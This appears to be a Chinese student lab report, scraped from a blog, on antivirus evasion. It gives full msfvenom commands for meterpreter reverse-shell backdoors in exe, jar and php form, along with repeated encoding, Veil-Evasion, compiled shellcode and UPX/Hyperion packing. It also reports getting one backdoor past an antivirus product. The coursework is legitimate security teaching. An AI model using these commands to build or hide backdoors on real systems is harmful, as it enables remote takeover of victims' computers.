2. 程式人生 > >20165120 Exp3 免殺原理與實踐 =v=

20165120 Exp3 免殺原理與實踐 =v=

阿新 發佈:2019-03-31
src sig rate 分享圖片 創建 殺毒軟件 port 執行文件 share

Exp3 免殺原理與實踐:

1. 實踐內容(4分)

1.1 正確使用msf編碼器(0.5分),msfvenom生成如jar之類的其他文件(0.5分),veil-evasion(0.5分),加殼工具(0.5分),使用shellcode編程(1分)

  1. 正確使用msf編碼器,生成exe文件
    我們在實驗二中使用msf生成過一次後門程序,我們可以使用Virscan這個網站對生成的後門程序進行掃描。用virscan掃描後結果如下:

技術分享圖片

2. 嘗試用msf編碼器對後門程序進行一次到多次的編碼
    十次編碼:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.144 LPORT=5120 -f exe > mpy20165120.exe

    技術分享圖片

   其中-i為指定編碼個數
將編碼十次後的可執行文件上傳到Virscan掃描後結果如下:

技術分享圖片

    編碼效果總得來說並沒有啥用=。=

3.msfvenom生成jar文件
生成Java後門程序使用命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.144 LPORT=5120 x> mpy.jar

技術分享圖片

    msfvenom生成php文件

    生成PHP後門程序使用命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.144 LPORT=5120 x> mpy2.php

技術分享圖片

    然後使用veil-evasion生成後門程序及檢測

   4.Veil-Evasion安裝:

    利用命令sudo apt-get install veil-evasion進行安裝,之後用veil打開veil,輸入y繼續安裝直至完成

技術分享圖片

    (ps:我不知道為什麽這個軟件可以安裝這麽久,運行邏輯簡直奇葩)

    安裝成功後輸入veil對此進行使用,啟動後就是這樣:

技術分享圖片

    

    接著輸入use evasion進入veil-evasion:

技術分享圖片

    用C語言重寫meterperter,use c/meterpreter/rev_tcp.py

    設置反彈連接IP及端口,註意此處IP是攻擊機IP
    輸入generate生成文件

    輸入playload文件名字

    技術分享圖片

    到/var/lib/veil/output/compiled/mpytest.exe這個路徑下找我們生成的exe文件:

技術分享圖片

    繼續放到網站上面檢測一下:

技術分享圖片

    好像厲害了一點哈?

  5、半手工註入Shellcode並執行

    首先使用命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.144 LPORT=5120 -f c

    用c語言生成一段shellcode;

    技術分享圖片

    創建一個文件mpy5.c,然後將unsigned char buf[]賦值到其中
    技術分享圖片

    使用命令i686-w64-mingw32-g++ mpy5.c -o mpy5.exe編譯.c文件為可執行文件,然後放到網站上面檢測:

    技術分享圖片

    將之前的半手工打造的shellcode進行加殼:upx mpy5.exe -o mpy6.exe

  技術分享圖片

    再掃一下:(加了殼之後反而還更容易別檢測出來了=。=)

    技術分享圖片

    加密殼Hyperion

    將上一個生成的文件拷貝到/usr/share/windows-binaries/hyperion/目錄中

    進入目錄/usr/share/windows-binaries/hyperion/

    輸入wine hyperion.exe -v mpy6.exe mpy6_Hyperion.exe

技術分享圖片

    然後再去網站上面掃一下:

     技術分享圖片

    然後更容易被檢測出來了!(wtf???)

    

1.2 通過組合應用各種技術實現惡意代碼免殺(0.5分)

(如果成功實現了免殺的,簡單語言描述原理,不要截圖。與殺軟共生的結果驗證要截圖。)

先放我們之前的文件查殺一下(能過最好。。。)

技術分享圖片

淦!被掃出來了,仔細想想有什麽辦法

我想起以前出逆向題的時候用過的一個加殼軟件,加個殼試試

技術分享圖片

然後生成的文件在丟出來查殺一下:

技術分享圖片

nice!成功了!

2 報告內容:

2.1.基礎問題回答

(1)殺軟是如何檢測出惡意代碼的?

根據本次實驗的經驗來看是通過特征碼來檢測的,因為原本的惡意軟件檢測出來的軟件比較少,加了殼之後的惡意軟件反而更能被識別出來了,說明這些殼都被加入了特征碼庫裏面。

(2)免殺是做什麽?

免殺是惡意軟件通過一些操作防止被殺毒軟件識別出來,以達到在用戶中留存的目的。

(3)免殺的基本方法有哪些?

修改惡意軟件的內容改變特征碼,或者加殼(比較復雜比較新的)之後就可以達到免殺的目的

2.2.實踐總結與體會

本次實驗最想讓我吐槽的一點就是veil這個軟件的安裝過程!!!真的是奇慢無比,後來查看了該軟件的運行邏輯,說真的很奇葩啊!我從別人那裏直接考了軟件本體跳了安裝部分終於成功了!

技術分享圖片

技術分享圖片

(ps:裝了一上午最後給我彈出來個這個真的有想把電腦砸掉的沖動)

2.3.開啟殺軟能絕對防止電腦中惡意代碼嗎?

不能,本次實驗的內容也說明了這一點,沒有百分百安全的系統,我們能做的就只有提高平時的安全意識,做到不亂下軟件,不瀏覽惡意網站,才能防止電腦中惡意代碼。

20165120 Exp3 免殺原理與實踐 =v=

相關推薦

20165120 Exp3 原理實踐 =v=

src sig rate 分享圖片 創建 殺毒軟件 port 執行文件 share Exp3 免殺原理與實踐: 1. 實踐內容(4分) 1.1 正確使用msf編碼器(0.5分),msfvenom生成如jar之類的其他文件(0.5分),veil-evasion(0.5

網絡對抗 Exp3 原理實踐 20154311 王卓然

下載軟件 get 改變 網站 加密 純手工 com 代碼 操作模式 Exp3 免殺原理與實踐 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? ①基於特征碼的檢測:AV軟件廠商通過檢測一個可執行文件是否包含一段與特征碼庫中相匹配的特征碼從而判斷是

2017-2018-4 20155317《網絡對抗技術》EXP3 原理實踐

運行 log jar idt 連通 進行 all 結果 暫時 2017-2018-4 20155317《網絡對抗技術》EXP3 免殺原理與實踐 一、問題回答 (1)殺軟是如何檢測出惡意代碼的? (2)免殺是做什麽? (3)免殺的基本方法有哪些? 2.實踐 (1) 正確

20154307《網絡對抗》Exp3 原理實踐

mark 我們 blocks 意思 釣魚 class 做了 更改權限 asio 20154307《網絡對抗》Exp3 免殺原理與實踐 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 基於特征碼的檢測:殺毒軟件檢測到有程序包含的特征碼與其特征碼庫的代碼相匹配,就會把該程

Exp3 原理實踐20154302薛師凡

代碼 AR 軟件 可執行文件 別了 模板生成 倒序 即使 get Exp3 免殺原理與實踐20154302薛師凡 一、實踐目標與內容 利用多種工具實現實現惡意代碼免殺 在另一臺電腦上,殺軟開啟的情況下,實現運行後門程序並回連成功。 在保證後門程序功能的情況下實現殺軟共存。

Exp3 原理實踐

asi 目標 專業 http lac 基礎 put 源文件 是個 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? -檢測特征碼 -基於行為檢測 -啟發式檢測類似 (2)免殺是做什麽? 使惡意軟件不被AV檢

20155232《網絡對抗》Exp3 原理實踐

分享圖片 alt 特征碼 apt 基本 什麽 簡單介紹 主機 介紹 20155232《網絡對抗》Exp3 免殺原理與實踐 問題回答 1.基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 基於特征碼的檢測 特征碼:一段特征碼就是一段或多段數據。 如果一個可執行文件(或其

20155202張旭 Exp3 原理實踐

ever 難受 virus 分片 告訴 kali 基於 文件夾 梳理 20155202張旭 Exp3 免殺原理與實踐 AV廠商檢測惡意軟件的方式主流的就三種: 基於特征碼的檢測 啟發式惡意軟件檢測 基於行為的惡意軟件檢測 我們要做的就是讓我們的惡意軟件沒法被這三種方式找到

20155320 Exp3 原理實踐

可執行 惡意代碼 執行 AR 後門 lock 函數 工具 文件復制 20155320 Exp3 免殺原理與實踐 免殺 一般是對惡意軟件做處理,讓它不被殺毒軟件所檢測。也是滲透測試中需要使用到的技術。 【基礎問題回答】 (1)殺軟是如何檢測出惡意代碼的? 1.通過行

20155219付穎卓 Exp3 原理實踐

但是 遇到 有一個 執行文件 圖書館 是個 alt .cn 現在 1.基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 殺毒軟件有一個病毒的特征碼庫,通過識別惡意代碼的特征碼或者特征片段檢測惡意代碼 殺毒軟件通過動態檢測對象文件的行為來識別惡意代碼,如果他的行為在一定程度

20155338《網絡對抗》Exp3 原理實踐

調用 編寫 上傳 權限 免殺 編譯運行 tcp 檢查 語言 20155338《網絡對抗》Exp3 免殺原理與實踐 實驗過程 一、免殺效果參考基準 Kali使用上次實驗msfvenom產生後門的可執行文件,上傳到老師提供的網址http://www.virscan.org/上進

2018-2019-2 網絡對抗技術 20165311 Exp3 原理實踐

col eno 比較 encode var 針對 name -s cnblogs 2018-2019-2 網絡對抗技術 20165311 Exp3 免殺原理與實踐 免殺原理及基礎問題回答 實驗內容 任務一:正確使用msf編碼器,msfvenom生成如j

2018-2019-2 網絡對抗技術 20165334 Exp3 原理實踐

語言 保護 r文件 原理 添加 ima port 復制 png 2018-2019-2 網絡對抗技術 20165334 Exp3 免殺原理與實踐 一、實驗內容 任務一正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,利用shellc

Exp3 原理實踐 ——20164316張子遙

ping 開啟 後門 tro 技術 創建 判斷 問題 rev 一、實踐基本內容 1.實踐目標 (1) 正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,加殼工具,使用shellcode編程 (2)通過組合應用各種技術實現惡意代

20165207 Exp3 原理實踐

編碼器 想要 功能 函數名 取值 generate 開始 重新 全局 Exp3 免殺原理與實踐 1、實驗內容 1.1、使用msf 1.1.1、 確定基準線 首先看kali的ip 直接msfvenom的結果,不加其他的東西: 使用VirusTotal得到的檢測這個程序得到

2018-2019-2 網絡對抗技術 20165210 Exp3 原理實踐

問題 網站 丟失 其他 圖片 https 壓縮包 exe 生成 2018-2019-2 網絡對抗技術 20165210 Exp3 免殺原理與實踐 免殺的概述 免殺,也就是反病毒(AntiVirus)與反間諜(AntiSpyware)的對立面,英文為Anti-AntiViru

2018-2019-2 網絡對抗技術 20165326 Exp3 原理實踐

log ant tool 能夠 校驗和 nco bin .html 錯誤代碼 免殺原理與實踐 目錄 知識點問答 實踐內容 遇到的問題 心得體會 知識點 meterpreter免殺 基礎問題回答 殺軟是如何檢測出惡意代碼的? 特征碼(基於簽名):模式匹配,比對特

20165214 2018-2019-2 《網絡對抗技術》Exp3 原理實踐 Week5

實現 進行 中間 信息 失敗 中一 網絡安全 需要 識別 《網絡對抗技術》Exp3 免殺原理與實踐 Week5 一、實驗內容 1、正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,加殼工具,使用shellcode編程; 2、通過組

20164317《網絡對抗技術》Exp3 原理實踐

實驗中遇到的問題 不同的 靜默安裝 組合 alt ping 程序 upx 上一個 一、實驗要求 1.1 正確使用msf編碼器(0.5分),msfvenom生成如jar之類的其他文件(0.5分),veil-evasion(0.5分),加殼工具(0.5分),使用shellco

20165229 NetSec Exp3原理實踐

可執行文件 沒有 哪些 .exe .com 三種 安全 基礎 net 20165229 NetSec Exp3免殺原理與實踐 實踐內容 1)正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,自己利用shellcode編程等免殺工具或